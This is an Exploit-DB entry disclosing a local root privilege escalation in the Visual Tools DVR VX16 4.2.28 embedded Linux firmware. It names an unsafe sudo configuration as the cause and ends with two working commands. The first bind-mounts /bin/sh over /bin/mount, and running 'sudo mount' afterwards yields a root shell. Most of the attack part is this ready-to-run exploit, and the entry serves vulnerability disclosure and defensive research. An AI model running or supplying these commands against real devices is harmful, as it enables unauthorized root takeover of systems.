Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation

EDB-ID:

50104

CVE:

N/A




Platform:

Hardware

Date:

2021-07-06


# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.

#An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration.

sudo mount -o bind /bin/sh /bin/mount
sudo mount